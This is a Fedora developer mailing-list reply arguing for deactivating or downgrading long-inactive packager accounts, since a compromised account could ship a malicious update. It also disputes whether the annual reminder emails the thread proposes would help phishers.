On Sat, Feb 12, 2022 at 12:00:11PM +0100, Vitaly Zaitsev via devel wrote: > On 11/02/2022 07:54, Zbigniew Jędrzejewski-Szmek wrote: > > With 1500+ unused accounts it is just*too easy* > > for someone to find a way to access one of the accounts in an unauthorized > > way. > > What they can do with this? Pushing a new update for the foo-bar package? We > have Bodhi against this. Let's talk about distro security basics. All packages are "equal": any package can ship any file, and in fact any package can execute scripts *as root* during installation. Thus, if you are able to create a build that is submitted as an update (i.e. either build it for rawhide, or build it for other releases and create a bodhi update), this is enough to wreak havoc at least on machines of people who use rawhide / updates-testing. As you certainly know, many updates don't receive any feedback, and almost all updates receive no scrutiny if they install without errors. Thus a nefarious update would have fairly high chances of going stable too. I suppose that at some point it would be noticed, and the update pulled and the account deactivated, but there is no automatic process for this. Bodhi runs tests, but not the kinds of tests that would help in any way against a nefarious update. > > In particular, if we removed the 'packager' bit, people would still > > have the account and all history associated with it. > > If you remove "packager" status, this user will probably leave Fedora. > > Maintainers are the main value of the distribution. We shouldn't offend and > forcing them to leave Fedora. We certainly don't want to push maintainers away. In fact this whole thread is primarily about striking the right balance between security and the desire not to inconvenience maintainers. > > For the identified users with no activity, I suppose that sending one > > email per year asking "hey, is this still your email account and are you > > still engaged in Fedora packaging" would be no harm. [It was actually Mattia who wrote this, not me.] The case of "one email per year" applies to the case of accounts which are detected as inactive each year (i.e. effectively have no koji activity over many years) *and* the packager in question replies each year that they want to keep the account active. So such repeated mails should be a very rare occurence. > And you make life easier for potential hackers. > > They will simply copy this email and send it to all Fedora contributors. > Some of them will follow the link and hackers will get a lot of real working > accounts. Ehh, I don't think so. There are many automated emails being sent by our infra. If a hacker wants to send a phishing email, they might just as well spoof a bugzilla ticket or a pagure notification. If we are about to downgrade an account, sending an email is the least we should do. Zbyszek _______________________________________________ devel mailing list -- devel@xxxxxxxxxxxxxxxxxxxxxxx To unsubscribe send an email to devel-leave@xxxxxxxxxxxxxxxxxxxxxxx Fedora Code of Conduct: https://docs.fedoraproject.org/en-US/project/code-of-conduct/ List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines List Archives: https://lists.fedoraproject.org/archives/list/devel@xxxxxxxxxxxxxxxxxxxxxxx Do not reply to spam on the list, report it: https://pagure.io/fedora-infrastructure